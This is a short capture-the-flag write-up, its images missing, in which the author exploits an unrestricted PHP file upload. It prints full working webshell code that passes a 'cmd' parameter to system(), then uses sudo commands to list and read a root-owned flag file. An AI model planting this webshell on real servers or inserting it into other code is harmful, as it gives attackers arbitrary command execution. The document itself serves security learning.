Problem
Solution
The website itself is quite simple:
Let’s start by uploading a normal image just to see what’s going on:
After uploading, we’re told where our file can be found. We also see that the server is using PHP (see the URL):
Navigating to the aforementioned URL, we find our uploaded file as promised (this one is pretty cool, right?):
Now that’s cool and all, but what else can we upload? Let’s try a webshell. I’m not too familiar with PHP or webshells, but I found this one to be simple and do the job just fine:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
So I saved this as webshell.php, and uploaded it:
Apparently the server isn’t picky about what file types can be uploaded:
Navigating to our webshell, we have a simple text field and an “Execute” button:
If we run sudo ls /root, we see a flag.txt:
Then sudo cat /root/flag.txt: